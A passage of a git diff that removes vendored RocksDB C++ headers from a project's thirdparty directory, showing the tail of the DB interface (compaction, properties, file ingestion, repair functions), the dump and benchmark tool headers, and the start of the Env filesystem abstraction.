-  //  "rocksdb.num-running-flushes"
-  //  "rocksdb.actual-delayed-write-rate"
-  //  "rocksdb.is-write-stopped"
-  //  "rocksdb.estimate-oldest-key-time"
-  virtual bool GetIntProperty(ColumnFamilyHandle* column_family,
-                              const Slice& property, uint64_t* value) = 0;
-  virtual bool GetIntProperty(const Slice& property, uint64_t* value) {
-    return GetIntProperty(DefaultColumnFamily(), property, value);
-  }
-
-  // Reset internal stats for DB and all column families.
-  // Note this doesn't reset options.statistics as it is not owned by
-  // DB.
-  virtual Status ResetStats() {
-    return Status::NotSupported("Not implemented");
-  }
-
-  // Same as GetIntProperty(), but this one returns the aggregated int
-  // property from all column families.
-  virtual bool GetAggregatedIntProperty(const Slice& property,
-                                        uint64_t* value) = 0;
-
-  // Flags for DB::GetSizeApproximation that specify whether memtable
-  // stats should be included, or file stats approximation or both
-  enum SizeApproximationFlags : uint8_t {
-    NONE = 0,
-    INCLUDE_MEMTABLES = 1,
-    INCLUDE_FILES = 1 << 1
-  };
-
-  // For each i in [0,n-1], store in "sizes[i]", the approximate
-  // file system space used by keys in "[range[i].start .. range[i].limit)".
-  //
-  // Note that the returned sizes measure file system space usage, so
-  // if the user data compresses by a factor of ten, the returned
-  // sizes will be one-tenth the size of the corresponding user data size.
-  //
-  // If include_flags defines whether the returned size should include
-  // the recently written data in the mem-tables (if
-  // the mem-table type supports it), data serialized to disk, or both.
-  // include_flags should be of type DB::SizeApproximationFlags
-  virtual void GetApproximateSizes(ColumnFamilyHandle* column_family,
-                                   const Range* range, int n, uint64_t* sizes,
-                                   uint8_t include_flags
-                                   = INCLUDE_FILES) = 0;
-  virtual void GetApproximateSizes(const Range* range, int n, uint64_t* sizes,
-                                   uint8_t include_flags
-                                   = INCLUDE_FILES) {
-    GetApproximateSizes(DefaultColumnFamily(), range, n, sizes,
-                        include_flags);
-  }
-
-  // The method is similar to GetApproximateSizes, except it
-  // returns approximate number of records in memtables.
-  virtual void GetApproximateMemTableStats(ColumnFamilyHandle* column_family,
-                                           const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) = 0;
-  virtual void GetApproximateMemTableStats(const Range& range,
-                                           uint64_t* const count,
-                                           uint64_t* const size) {
-    GetApproximateMemTableStats(DefaultColumnFamily(), range, count, size);
-  }
-
-  // Deprecated versions of GetApproximateSizes
-  ROCKSDB_DEPRECATED_FUNC virtual void GetApproximateSizes(
-      const Range* range, int n, uint64_t* sizes,
-      bool include_memtable) {
-    uint8_t include_flags = SizeApproximationFlags::INCLUDE_FILES;
-    if (include_memtable) {
-      include_flags |= SizeApproximationFlags::INCLUDE_MEMTABLES;
-    }
-    GetApproximateSizes(DefaultColumnFamily(), range, n, sizes, include_flags);
-  }
-  ROCKSDB_DEPRECATED_FUNC virtual void GetApproximateSizes(
-      ColumnFamilyHandle* column_family,
-      const Range* range, int n, uint64_t* sizes,
-      bool include_memtable) {
-    uint8_t include_flags = SizeApproximationFlags::INCLUDE_FILES;
-    if (include_memtable) {
-      include_flags |= SizeApproximationFlags::INCLUDE_MEMTABLES;
-    }
-    GetApproximateSizes(column_family, range, n, sizes, include_flags);
-  }
-
-  // Compact the underlying storage for the key range [*begin,*end].
-  // The actual compaction interval might be superset of [*begin, *end].
-  // In particular, deleted and overwritten versions are discarded,
-  // and the data is rearranged to reduce the cost of operations
-  // needed to access the data.  This operation should typically only
-  // be invoked by users who understand the underlying implementation.
-  //
-  // begin==nullptr is treated as a key before all keys in the database.
-  // end==nullptr is treated as a key after all keys in the database.
-  // Therefore the following call will compact the entire database:
-  //    db->CompactRange(options, nullptr, nullptr);
-  // Note that after the entire database is compacted, all data are pushed
-  // down to the last level containing any data. If the total data size after
-  // compaction is reduced, that level might not be appropriate for hosting all
-  // the files. In this case, client could set options.change_level to true, to
-  // move the files back to the minimum level capable of holding the data set
-  // or a given level (specified by non-negative options.target_level).
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              ColumnFamilyHandle* column_family,
-                              const Slice* begin, const Slice* end) = 0;
-  virtual Status CompactRange(const CompactRangeOptions& options,
-                              const Slice* begin, const Slice* end) {
-    return CompactRange(options, DefaultColumnFamily(), begin, end);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status CompactRange(
-      ColumnFamilyHandle* column_family, const Slice* begin, const Slice* end,
-      bool change_level = false, int target_level = -1,
-      uint32_t target_path_id = 0) {
-    CompactRangeOptions options;
-    options.change_level = change_level;
-    options.target_level = target_level;
-    options.target_path_id = target_path_id;
-    return CompactRange(options, column_family, begin, end);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status CompactRange(
-      const Slice* begin, const Slice* end, bool change_level = false,
-      int target_level = -1, uint32_t target_path_id = 0) {
-    CompactRangeOptions options;
-    options.change_level = change_level;
-    options.target_level = target_level;
-    options.target_path_id = target_path_id;
-    return CompactRange(options, DefaultColumnFamily(), begin, end);
-  }
-
-  virtual Status SetOptions(
-      ColumnFamilyHandle* /*column_family*/,
-      const std::unordered_map<std::string, std::string>& /*new_options*/) {
-    return Status::NotSupported("Not implemented");
-  }
-  virtual Status SetOptions(
-      const std::unordered_map<std::string, std::string>& new_options) {
-    return SetOptions(DefaultColumnFamily(), new_options);
-  }
-
-  virtual Status SetDBOptions(
-      const std::unordered_map<std::string, std::string>& new_options) = 0;
-
-  // CompactFiles() inputs a list of files specified by file numbers and
-  // compacts them to the specified level. Note that the behavior is different
-  // from CompactRange() in that CompactFiles() performs the compaction job
-  // using the CURRENT thread.
-  //
-  // @see GetDataBaseMetaData
-  // @see GetColumnFamilyMetaData
-  virtual Status CompactFiles(
-      const CompactionOptions& compact_options,
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& input_file_names,
-      const int output_level, const int output_path_id = -1) = 0;
-
-  virtual Status CompactFiles(
-      const CompactionOptions& compact_options,
-      const std::vector<std::string>& input_file_names,
-      const int output_level, const int output_path_id = -1) {
-    return CompactFiles(compact_options, DefaultColumnFamily(),
-                        input_file_names, output_level, output_path_id);
-  }
-
-  // This function will wait until all currently running background processes
-  // finish. After it returns, no background process will be run until
-  // UnblockBackgroundWork is called
-  virtual Status PauseBackgroundWork() = 0;
-  virtual Status ContinueBackgroundWork() = 0;
-
-  // This function will enable automatic compactions for the given column
-  // families if they were previously disabled. The function will first set the
-  // disable_auto_compactions option for each column family to 'false', after
-  // which it will schedule a flush/compaction.
-  //
-  // NOTE: Setting disable_auto_compactions to 'false' through SetOptions() API
-  // does NOT schedule a flush/compaction afterwards, and only changes the
-  // parameter itself within the column family option.
-  //
-  virtual Status EnableAutoCompaction(
-      const std::vector<ColumnFamilyHandle*>& column_family_handles) = 0;
-
-  // Number of levels used for this DB.
-  virtual int NumberLevels(ColumnFamilyHandle* column_family) = 0;
-  virtual int NumberLevels() { return NumberLevels(DefaultColumnFamily()); }
-
-  // Maximum level to which a new compacted memtable is pushed if it
-  // does not create overlap.
-  virtual int MaxMemCompactionLevel(ColumnFamilyHandle* column_family) = 0;
-  virtual int MaxMemCompactionLevel() {
-    return MaxMemCompactionLevel(DefaultColumnFamily());
-  }
-
-  // Number of files in level-0 that would stop writes.
-  virtual int Level0StopWriteTrigger(ColumnFamilyHandle* column_family) = 0;
-  virtual int Level0StopWriteTrigger() {
-    return Level0StopWriteTrigger(DefaultColumnFamily());
-  }
-
-  // Get DB name -- the exact same name that was provided as an argument to
-  // DB::Open()
-  virtual const std::string& GetName() const = 0;
-
-  // Get Env object from the DB
-  virtual Env* GetEnv() const = 0;
-
-  // Get DB Options that we use.  During the process of opening the
-  // column family, the options provided when calling DB::Open() or
-  // DB::CreateColumnFamily() will have been "sanitized" and transformed
-  // in an implementation-defined manner.
-  virtual Options GetOptions(ColumnFamilyHandle* column_family) const = 0;
-  virtual Options GetOptions() const {
-    return GetOptions(DefaultColumnFamily());
-  }
-
-  virtual DBOptions GetDBOptions() const = 0;
-
-  // Flush all mem-table data.
-  virtual Status Flush(const FlushOptions& options,
-                       ColumnFamilyHandle* column_family) = 0;
-  virtual Status Flush(const FlushOptions& options) {
-    return Flush(options, DefaultColumnFamily());
-  }
-
-  // Flush the WAL memory buffer to the file. If sync is true, it calls SyncWAL
-  // afterwards.
-  virtual Status FlushWAL(bool sync) {
-    return Status::NotSupported("FlushWAL not implemented");
-  }
-  // Sync the wal. Note that Write() followed by SyncWAL() is not exactly the
-  // same as Write() with sync=true: in the latter case the changes won't be
-  // visible until the sync is done.
-  // Currently only works if allow_mmap_writes = false in Options.
-  virtual Status SyncWAL() = 0;
-
-  // The sequence number of the most recent transaction.
-  virtual SequenceNumber GetLatestSequenceNumber() const = 0;
-
-#ifndef ROCKSDB_LITE
-
-  // Prevent file deletions. Compactions will continue to occur,
-  // but no obsolete files will be deleted. Calling this multiple
-  // times have the same effect as calling it once.
-  virtual Status DisableFileDeletions() = 0;
-
-  // Allow compactions to delete obsolete files.
-  // If force == true, the call to EnableFileDeletions() will guarantee that
-  // file deletions are enabled after the call, even if DisableFileDeletions()
-  // was called multiple times before.
-  // If force == false, EnableFileDeletions will only enable file deletion
-  // after it's been called at least as many times as DisableFileDeletions(),
-  // enabling the two methods to be called by two threads concurrently without
-  // synchronization -- i.e., file deletions will be enabled only after both
-  // threads call EnableFileDeletions()
-  virtual Status EnableFileDeletions(bool force = true) = 0;
-
-  // GetLiveFiles followed by GetSortedWalFiles can generate a lossless backup
-
-  // Retrieve the list of all files in the database. The files are
-  // relative to the dbname and are not absolute paths. The valid size of the
-  // manifest file is returned in manifest_file_size. The manifest file is an
-  // ever growing file, but only the portion specified by manifest_file_size is
-  // valid for this snapshot.
-  // Setting flush_memtable to true does Flush before recording the live files.
-  // Setting flush_memtable to false is useful when we don't want to wait for
-  // flush which may have to wait for compaction to complete taking an
-  // indeterminate time.
-  //
-  // In case you have multiple column families, even if flush_memtable is true,
-  // you still need to call GetSortedWalFiles after GetLiveFiles to compensate
-  // for new data that arrived to already-flushed column families while other
-  // column families were flushing
-  virtual Status GetLiveFiles(std::vector<std::string>&,
-                              uint64_t* manifest_file_size,
-                              bool flush_memtable = true) = 0;
-
-  // Retrieve the sorted list of all wal files with earliest file first
-  virtual Status GetSortedWalFiles(VectorLogPtr& files) = 0;
-
-  // Sets iter to an iterator that is positioned at a write-batch containing
-  // seq_number. If the sequence number is non existent, it returns an iterator
-  // at the first available seq_no after the requested seq_no
-  // Returns Status::OK if iterator is valid
-  // Must set WAL_ttl_seconds or WAL_size_limit_MB to large values to
-  // use this api, else the WAL files will get
-  // cleared aggressively and the iterator might keep getting invalid before
-  // an update is read.
-  virtual Status GetUpdatesSince(
-      SequenceNumber seq_number, unique_ptr<TransactionLogIterator>* iter,
-      const TransactionLogIterator::ReadOptions&
-          read_options = TransactionLogIterator::ReadOptions()) = 0;
-
-// Windows API macro interference
-#undef DeleteFile
-  // Delete the file name from the db directory and update the internal state to
-  // reflect that. Supports deletion of sst and log files only. 'name' must be
-  // path relative to the db directory. eg. 000001.sst, /archive/000003.log
-  virtual Status DeleteFile(std::string name) = 0;
-
-  // Returns a list of all table files with their level, start key
-  // and end key
-  virtual void GetLiveFilesMetaData(
-      std::vector<LiveFileMetaData>* /*metadata*/) {}
-
-  // Obtains the meta data of the specified column family of the DB.
-  // Status::NotFound() will be returned if the current DB does not have
-  // any column family match the specified name.
-  //
-  // If cf_name is not specified, then the metadata of the default
-  // column family will be returned.
-  virtual void GetColumnFamilyMetaData(ColumnFamilyHandle* /*column_family*/,
-                                       ColumnFamilyMetaData* /*metadata*/) {}
-
-  // Get the metadata of the default column family.
-  void GetColumnFamilyMetaData(
-      ColumnFamilyMetaData* metadata) {
-    GetColumnFamilyMetaData(DefaultColumnFamily(), metadata);
-  }
-
-  // IngestExternalFile() will load a list of external SST files (1) into the DB
-  // Two primary modes are supported:
-  // - Duplicate keys in the new files will overwrite exiting keys (default)
-  // - Duplicate keys will be skipped (set ingest_behind=true)
-  // In the first mode we will try to find the lowest possible level that
-  // the file can fit in, and ingest the file into this level (2). A file that
-  // have a key range that overlap with the memtable key range will require us
-  // to Flush the memtable first before ingesting the file.
-  // In the second mode we will always ingest in the bottom mode level (see
-  // docs to IngestExternalFileOptions::ingest_behind).
-  //
-  // (1) External SST files can be created using SstFileWriter
-  // (2) We will try to ingest the files to the lowest possible level
-  //     even if the file compression doesn't match the level compression
-  // (3) If IngestExternalFileOptions->ingest_behind is set to true,
-  //     we always ingest at the bottommost level, which should be reserved
-  //     for this purpose (see DBOPtions::allow_ingest_behind flag).
-  virtual Status IngestExternalFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& options) = 0;
-
-  virtual Status IngestExternalFile(
-      const std::vector<std::string>& external_files,
-      const IngestExternalFileOptions& options) {
-    return IngestExternalFile(DefaultColumnFamily(), external_files, options);
-  }
-
-  virtual Status VerifyChecksum() = 0;
-
-  // AddFile() is deprecated, please use IngestExternalFile()
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<std::string>& file_path_list, bool move_file = false,
-      bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(column_family, file_path_list, ifo);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      const std::vector<std::string>& file_path_list, bool move_file = false,
-      bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(DefaultColumnFamily(), file_path_list, ifo);
-  }
-
-  // AddFile() is deprecated, please use IngestExternalFile()
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      ColumnFamilyHandle* column_family, const std::string& file_path,
-      bool move_file = false, bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(column_family, {file_path}, ifo);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      const std::string& file_path, bool move_file = false,
-      bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(DefaultColumnFamily(), {file_path}, ifo);
-  }
-
-  // Load table file with information "file_info" into "column_family"
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      ColumnFamilyHandle* column_family,
-      const std::vector<ExternalSstFileInfo>& file_info_list,
-      bool move_file = false, bool skip_snapshot_check = false) {
-    std::vector<std::string> external_files;
-    for (const ExternalSstFileInfo& file_info : file_info_list) {
-      external_files.push_back(file_info.file_path);
-    }
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(column_family, external_files, ifo);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      const std::vector<ExternalSstFileInfo>& file_info_list,
-      bool move_file = false, bool skip_snapshot_check = false) {
-    std::vector<std::string> external_files;
-    for (const ExternalSstFileInfo& file_info : file_info_list) {
-      external_files.push_back(file_info.file_path);
-    }
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(DefaultColumnFamily(), external_files, ifo);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      ColumnFamilyHandle* column_family, const ExternalSstFileInfo* file_info,
-      bool move_file = false, bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(column_family, {file_info->file_path}, ifo);
-  }
-
-  ROCKSDB_DEPRECATED_FUNC virtual Status AddFile(
-      const ExternalSstFileInfo* file_info, bool move_file = false,
-      bool skip_snapshot_check = false) {
-    IngestExternalFileOptions ifo;
-    ifo.move_files = move_file;
-    ifo.snapshot_consistency = !skip_snapshot_check;
-    ifo.allow_global_seqno = false;
-    ifo.allow_blocking_flush = false;
-    return IngestExternalFile(DefaultColumnFamily(), {file_info->file_path},
-                              ifo);
-  }
-
-#endif  // ROCKSDB_LITE
-
-  // Sets the globally unique ID created at database creation time by invoking
-  // Env::GenerateUniqueId(), in identity. Returns Status::OK if identity could
-  // be set properly
-  virtual Status GetDbIdentity(std::string& identity) const = 0;
-
-  // Returns default column family handle
-  virtual ColumnFamilyHandle* DefaultColumnFamily() const = 0;
-
-#ifndef ROCKSDB_LITE
-  virtual Status GetPropertiesOfAllTables(ColumnFamilyHandle* column_family,
-                                          TablePropertiesCollection* props) = 0;
-  virtual Status GetPropertiesOfAllTables(TablePropertiesCollection* props) {
-    return GetPropertiesOfAllTables(DefaultColumnFamily(), props);
-  }
-  virtual Status GetPropertiesOfTablesInRange(
-      ColumnFamilyHandle* column_family, const Range* range, std::size_t n,
-      TablePropertiesCollection* props) = 0;
-
-  virtual Status SuggestCompactRange(ColumnFamilyHandle* column_family,
-                                     const Slice* begin, const Slice* end) {
-    return Status::NotSupported("SuggestCompactRange() is not implemented.");
-  }
-
-  virtual Status PromoteL0(ColumnFamilyHandle* column_family,
-                           int target_level) {
-    return Status::NotSupported("PromoteL0() is not implemented.");
-  }
-
-#endif  // ROCKSDB_LITE
-
-  // Needed for StackableDB
-  virtual DB* GetRootDB() { return this; }
-
- private:
-  // No copying allowed
-  DB(const DB&);
-  void operator=(const DB&);
-};
-
-// Destroy the contents of the specified database.
-// Be very careful using this method.
-Status DestroyDB(const std::string& name, const Options& options);
-
-#ifndef ROCKSDB_LITE
-// If a DB cannot be opened, you may attempt to call this method to
-// resurrect as much of the contents of the database as possible.
-// Some data may be lost, so be careful when calling this function
-// on a database that contains important information.
-//
-// With this API, we will warn and skip data associated with column families not
-// specified in column_families.
-//
-// @param column_families Descriptors for known column families
-Status RepairDB(const std::string& dbname, const DBOptions& db_options,
-                const std::vector<ColumnFamilyDescriptor>& column_families);
-
-// @param unknown_cf_opts Options for column families encountered during the
-//                        repair that were not specified in column_families.
-Status RepairDB(const std::string& dbname, const DBOptions& db_options,
-                const std::vector<ColumnFamilyDescriptor>& column_families,
-                const ColumnFamilyOptions& unknown_cf_opts);
-
-// @param options These options will be used for the database and for ALL column
-//                families encountered during the repair
-Status RepairDB(const std::string& dbname, const Options& options);
-
-#endif
-
-}  // namespace rocksdb
-
-#endif  // STORAGE_ROCKSDB_INCLUDE_DB_H_
diff --git a/thirdparty/rocksdb/include/rocksdb/db_bench_tool.h b/thirdparty/rocksdb/include/rocksdb/db_bench_tool.h
deleted file mode 100644
index 047c425..0000000
--- a/thirdparty/rocksdb/include/rocksdb/db_bench_tool.h
+++ /dev/null
@@ -1,9 +0,0 @@
-// Copyright (c) 2013-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-namespace rocksdb {
-int db_bench_tool(int argc, char** argv);
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/include/rocksdb/db_dump_tool.h b/thirdparty/rocksdb/include/rocksdb/db_dump_tool.h
deleted file mode 100644
index cb9a265..0000000
--- a/thirdparty/rocksdb/include/rocksdb/db_dump_tool.h
+++ /dev/null
@@ -1,45 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#ifndef ROCKSDB_LITE
-
-#include <string>
-
-#include "rocksdb/db.h"
-
-namespace rocksdb {
-
-struct DumpOptions {
-  // Database that will be dumped
-  std::string db_path;
-  // File location that will contain dump output
-  std::string dump_location;
-  // Dont include db information header in the dump
-  bool anonymous = false;
-};
-
-class DbDumpTool {
- public:
-  bool Run(const DumpOptions& dump_options,
-           rocksdb::Options options = rocksdb::Options());
-};
-
-struct UndumpOptions {
-  // Database that we will load the dumped file into
-  std::string db_path;
-  // File location of the dumped file that will be loaded
-  std::string dump_location;
-  // Compact the db after loading the dumped file
-  bool compact_db = false;
-};
-
-class DbUndumpTool {
- public:
-  bool Run(const UndumpOptions& undump_options,
-           rocksdb::Options options = rocksdb::Options());
-};
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/include/rocksdb/env.h b/thirdparty/rocksdb/include/rocksdb/env.h
deleted file mode 100644
index 709d503..0000000
--- a/thirdparty/rocksdb/include/rocksdb/env.h
+++ /dev/null
@@ -1,1137 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// An Env is an interface used by the rocksdb implementation to access
-// operating system functionality like the filesystem etc.  Callers
-// may wish to provide a custom Env object when opening a database to
-// get fine gain control; e.g., to rate limit file system operations.
-//
-// All Env implementations are safe for concurrent access from
-// multiple threads without any external synchronization.
-
-#ifndef STORAGE_ROCKSDB_INCLUDE_ENV_H_
-#define STORAGE_ROCKSDB_INCLUDE_ENV_H_
-
-#include <stdint.h>
-#include <cstdarg>
-#include <functional>
-#include <limits>
-#include <memory>
-#include <string>
-#include <vector>
-#include "rocksdb/status.h"
-#include "rocksdb/thread_status.h"
-
-#ifdef _WIN32
-// Windows API macro interference
-#undef DeleteFile
-#undef GetCurrentTime
-#endif
-
-namespace rocksdb {
-
-class FileLock;
-class Logger;
-class RandomAccessFile;
-class SequentialFile;
-class Slice;
-class WritableFile;
-class RandomRWFile;
-class Directory;
-struct DBOptions;
-struct ImmutableDBOptions;
-class RateLimiter;
-class ThreadStatusUpdater;
-struct ThreadStatus;
-
-using std::unique_ptr;
-using std::shared_ptr;
-
-const size_t kDefaultPageSize = 4 * 1024;
-
-// Options while opening a file to read/write
-struct EnvOptions {
-
-  // Construct with default Options
-  EnvOptions();
-
-  // Construct from Options
-  explicit EnvOptions(const DBOptions& options);
-
-   // If true, then use mmap to read data
-  bool use_mmap_reads = false;
-
-   // If true, then use mmap to write data
-  bool use_mmap_writes = true;
-
-  // If true, then use O_DIRECT for reading data
-  bool use_direct_reads = false;
-
-  // If true, then use O_DIRECT for writing data
-  bool use_direct_writes = false;
-
-  // If false, fallocate() calls are bypassed
-  bool allow_fallocate = true;
-
-  // If true, set the FD_CLOEXEC on open fd.
-  bool set_fd_cloexec = true;
-
-  // Allows OS to incrementally sync files to disk while they are being
-  // written, in the background. Issue one request for every bytes_per_sync
-  // written. 0 turns it off.
-  // Default: 0
-  uint64_t bytes_per_sync = 0;
-
-  // If true, we will preallocate the file with FALLOC_FL_KEEP_SIZE flag, which
-  // means that file size won't change as part of preallocation.
-  // If false, preallocation will also change the file size. This option will
-  // improve the performance in workloads where you sync the data on every
-  // write. By default, we set it to true for MANIFEST writes and false for
-  // WAL writes
-  bool fallocate_with_keep_size = true;
-
-  // See DBOptions doc
-  size_t compaction_readahead_size;
-
-  // See DBOptions doc
-  size_t random_access_max_buffer_size;
-
-  // See DBOptions doc
-  size_t writable_file_max_buffer_size = 1024 * 1024;
-
-  // If not nullptr, write rate limiting is enabled for flush and compaction
-  RateLimiter* rate_limiter = nullptr;
-};
-
-class Env {
- public:
-  struct FileAttributes {
-    // File name
-    std::string name;
-
-    // Size of file in bytes
-    uint64_t size_bytes;
-  };
-
-  Env() : thread_status_updater_(nullptr) {}
-
-  virtual ~Env();
-
-  // Return a default environment suitable for the current operating
-  // system.  Sophisticated users may wish to provide their own Env
-  // implementation instead of relying on this default environment.
-  //
-  // The result of Default() belongs to rocksdb and must never be deleted.
-  static Env* Default();
-
-  // Create a brand new sequentially-readable file with the specified name.
-  // On success, stores a pointer to the new file in *result and returns OK.
-  // On failure stores nullptr in *result and returns non-OK.  If the file does
-  // not exist, returns a non-OK status.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status NewSequentialFile(const std::string& fname,
-                                   unique_ptr<SequentialFile>* result,
-                                   const EnvOptions& options)
-                                   = 0;
-
-  // Create a brand new random access read-only file with the
-  // specified name.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.  If the file does not exist, returns a non-OK
-  // status.
-  //
-  // The returned file may be concurrently accessed by multiple threads.
-  virtual Status NewRandomAccessFile(const std::string& fname,
-                                     unique_ptr<RandomAccessFile>* result,
-                                     const EnvOptions& options)
-                                     = 0;
-
-  // Create an object that writes to a new file with the specified
-  // name.  Deletes any existing file with the same name and creates a
-  // new file.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status NewWritableFile(const std::string& fname,
-                                 unique_ptr<WritableFile>* result,
-                                 const EnvOptions& options) = 0;
-
-  // Create an object that writes to a new file with the specified
-  // name.  Deletes any existing file with the same name and creates a
-  // new file.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure stores nullptr in *result and
-  // returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status ReopenWritableFile(const std::string& fname,
-                                    unique_ptr<WritableFile>* result,
-                                    const EnvOptions& options) {
-    return Status::NotSupported();
-  }
-
-  // Reuse an existing file by renaming it and opening it as writable.
-  virtual Status ReuseWritableFile(const std::string& fname,
-                                   const std::string& old_fname,
-                                   unique_ptr<WritableFile>* result,
-                                   const EnvOptions& options);
-
-  // Open `fname` for random read and write, if file doesn't exist the file
-  // will be created.  On success, stores a pointer to the new file in
-  // *result and returns OK.  On failure returns non-OK.
-  //
-  // The returned file will only be accessed by one thread at a time.
-  virtual Status NewRandomRWFile(const std::string& fname,
-                                 unique_ptr<RandomRWFile>* result,
-                                 const EnvOptions& options) {
-    return Status::NotSupported("RandomRWFile is not implemented in this Env");
-  }
-
-  // Create an object that represents a directory. Will fail if directory
-  // doesn't exist. If the directory exists, it will open the directory
-  // and create a new Directory object.
-  //
-  // On success, stores a pointer to the new Directory in
-  // *result and returns OK. On failure stores nullptr in *result and
-  // returns non-OK.
-  virtual Status NewDirectory(const std::string& name,
-                              unique_ptr<Directory>* result) = 0;
-
-  // Returns OK if the named file exists.
-  //         NotFound if the named file does not exist,
-  //                  the calling process does not have permission to determine
-  //                  whether this file exists, or if the path is invalid.
-  //         IOError if an IO Error was encountered
-  virtual Status FileExists(const std::string& fname) = 0;
-
-  // Store in *result the names of the children of the specified directory.
-  // The names are relative to "dir".
-  // Original contents of *results are dropped.
-  // Returns OK if "dir" exists and "*result" contains its children.
-  //         NotFound if "dir" does not exist, the calling process does not have
-  //                  permission to access "dir", or if "dir" is invalid.
-  //         IOError if an IO Error was encountered
-  virtual Status GetChildren(const std::string& dir,
-                             std::vector<std::string>* result) = 0;
-
-  // Store in *result the attributes of the children of the specified directory.
-  // In case the implementation lists the directory prior to iterating the files
-  // and files are concurrently deleted, the deleted files will be omitted from
-  // result.
-  // The name attributes are relative to "dir".
-  // Original contents of *results are dropped.
-  // Returns OK if "dir" exists and "*result" contains its children.
-  //         NotFound if "dir" does not exist, the calling process does not have
-  //                  permission to access "dir", or if "dir" is invalid.
-  //         IOError if an IO Error was encountered
-  virtual Status GetChildrenFileAttributes(const std::string& dir,
-                                           std::vector<FileAttributes>* result);
-
-  // Delete the named file.
-  virtual Status DeleteFile(const std::string& fname) = 0;
-
-  // Create the specified directory. Returns error if directory exists.
-  virtual Status CreateDir(const std::string& dirname) = 0;
-
-  // Creates directory if missing. Return Ok if it exists, or successful in
-  // Creating.
-  virtual Status CreateDirIfMissing(const std::string& dirname) = 0;
-
-  // Delete the specified directory.
-  virtual Status DeleteDir(const std::string& dirname) = 0;
-
-  // Store the size of fname in *file_size.
-  virtual Status GetFileSize(const std::string& fname, uint64_t* file_size) = 0;
-
-  // Store the last modification time of fname in *file_mtime.
-  virtual Status GetFileModificationTime(const std::string& fname,
-                                         uint64_t* file_mtime) = 0;
-  // Rename file src to target.
-  virtual Status RenameFile(const std::string& src,
-                            const std::string& target) = 0;
-
-  // Hard Link file src to target.
-  virtual Status LinkFile(const std::string& src, const std::string& target) {
-    return Status::NotSupported("LinkFile is not supported for this Env");
-  }
-
-  // Lock the specified file.  Used to prevent concurrent access to
-  // the same db by multiple processes.  On failure, stores nullptr in
-  // *lock and returns non-OK.
-  //
-  // On success, stores a pointer to the object that represents the
-  // acquired lock in *lock and returns OK.  The caller should call
-  // UnlockFile(*lock) to release the lock.  If the process exits,
-  // the lock will be automatically released.
-  //
-  // If somebody else already holds the lock, finishes immediately
-  // with a failure.  I.e., this call does not wait for existing locks
-  // to go away.
-  //
-  // May create the named file if it does not already exist.
-  virtual Status LockFile(const std::string& fname, FileLock** lock) = 0;
-
-  // Release the lock acquired by a previous successful call to LockFile.
